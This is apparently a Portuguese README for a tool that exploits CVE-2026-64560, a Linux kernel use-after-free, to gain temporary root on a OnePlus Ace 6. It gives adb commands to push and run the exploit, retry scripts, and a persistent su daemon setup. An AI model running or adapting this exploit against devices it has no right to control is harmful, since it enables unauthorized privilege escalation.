
Ferramenta de root temporário para OnePlus Ace 6 (CVE-2026-64560) - porta verificada no dispositivo com endereço bootidParent corrigido
Obtém privilégios de root temporários no ciclo de inicialização atual do OnePlus Ace 6 através da CVE-2026-64560 (vulnerabilidade UAF no POSIX CPU timer do kernel Linux). Torna-se inválido após reiniciar, sem modificar as partições do sistema.
[!WARNING] Pode causar reinicialização do dispositivo ou perda de dados. Utilize apenas no seu próprio dispositivo e faça backup dos dados importantes antes de prosseguir.
| Item | Informação |
|---|---|
| Dispositivo | OnePlus Ace 6 (OP6113L1) |
| Impressão digital do firmware | OnePlus/PLQ110/OP6113L1:16/BP2A.250605.015/... |
| Versão do kernel | 6.6.118-android15-8-... |
Se a impressão digital da versão do seu sistema não corresponder, a ferramenta recusará a execução e exibirá TARGET_PROFILE_GATE_FAIL.
adb instalado (link de download, extraia e adicione o caminho ao PATH do sistema)Acesse a página de Releases deste repositório e baixe a versão mais recente de cve-2026-64560-fanout-opace6.
Coloque o arquivo baixado em um local de fácil acesso, como a área de trabalho.
Conecte o telefone ao computador com o cabo USB e toque em "Permitir depuração USB" na janela que aparecer no telefone.
Abra o terminal (no Windows, pressione Win+R, digite cmd e pressione Enter) e verifique se o dispositivo está conectado:
adb devices
Você deverá ver o número de série do seu dispositivo com o status device. Se aparecer unauthorized, toque em permitir no telefone.
Windows:
adb push C:\Users\你的用户名\Desktop\cve-2026-64560-fanout-opace6 /data/local/tmp/
adb shell chmod 777 /data/local/tmp/cve-2026-64560-fanout-opace6
macOS / Linux:
adb push ~/Desktop/cve-2026-64560-fanout-opace6 /data/local/tmp/
adb shell chmod 777 /data/local/tmp/cve-2026-64560-fanout-opace6
Atenção: É obrigatório dar permissão
777;755resultará em Permission denied.
Execute primeiro a pré-verificação para confirmar que seu dispositivo pode ser utilizado:
adb shell /data/local/tmp/cve-2026-64560-fanout-opace6 --preflight
Se aparecer PREFLIGHT_PASS, está tudo certo e você pode continuar.
Se aparecer TARGET_PROFILE_GATE_FAIL, sua versão de sistema não corresponde e não pode ser utilizada.
Esta ferramenta explora uma condição de corrida no kernel, sendo probabilística, podendo exigir várias tentativas ou até várias reinicializações.
O script automático fará as tentativas por você, incluindo reiniciar o dispositivo automaticamente, aguardar o resfriamento e detectar o sucesso.
Windows:
Coloque o scripts\boot-campaign.bat deste repositório e o payload baixado na mesma pasta,
depois entre nessa pasta pelo CMD e execute:
boot-campaign.bat -n 6
-n 6 significa até 6 tentativas com reinicialização. O script irá automaticamente:
macOS / Linux:
sh scripts/boot-campaign.sh -p cve-2026-64560-fanout-opace6 -n 6
(Opcional: -u cve-2026-64560-su especifica o caminho do temp-su; após o sucesso, a sessão root pode ser usada em outros terminais.)
adb shell /data/local/tmp/cve-2026-64560-fanout-opace6 --run
Se não obtiver sucesso (não aparecer ROOT_SUCCESS), reinicie o telefone e tente novamente. Recomenda-se esperar o telefone esfriar antes de tentar,
pois temperaturas elevadas da CPU reduzem a taxa de sucesso.
Após o sucesso, você verá ROOT_SUCCESS / ROOT_CHILD_HOLD_PASS.
O shell root está na mesma janela de terminal onde você executou --run (o exploit exibirá
interactive root child; exit to finish); digite id diretamente e, se aparecer
uid=0(root), significa que você obteve privilégios de root.
Se quiser usar o root em outro terminal, primeiro é necessário manter a sessão root persistente:
Obtenha o cve-2026-64560-su (não está no Release, veja os
artefatos de build do Actions do repositório,
ou compile src/temp-su.c com o Android NDK) e envie para o telefone:
adb push cve-2026-64560-su /data/local/tmp/su
adb shell chmod 755 /data/local/tmp/su
No shell root do exploit, execute:
/data/local/tmp/su --daemon
Depois, em qualquer terminal, execute adb shell /data/local/tmp/su e digite id para verificar.
Atenção: Ao usar
boot-campaign.bat/boot-campaign.sh, coloque ocve-2026-64560-suno mesmo diretório do payload (ou especifique o caminho com-u); o script irá enviá-lo e iniciar o daemon automaticamente.
Importante: Os privilégios de root são válidos apenas para esta inicialização; após reiniciar o telefone, será necessário executar novamente. As partições boot, vendor e system não são modificadas, não afetando atualizações OTA.
Upstream: NebuSec/CyberMeowfia. Para revisões específicas e correções do Linux, veja docs/UPSTREAM.md. Apache License 2.0; veja LICENSE e NOTICE.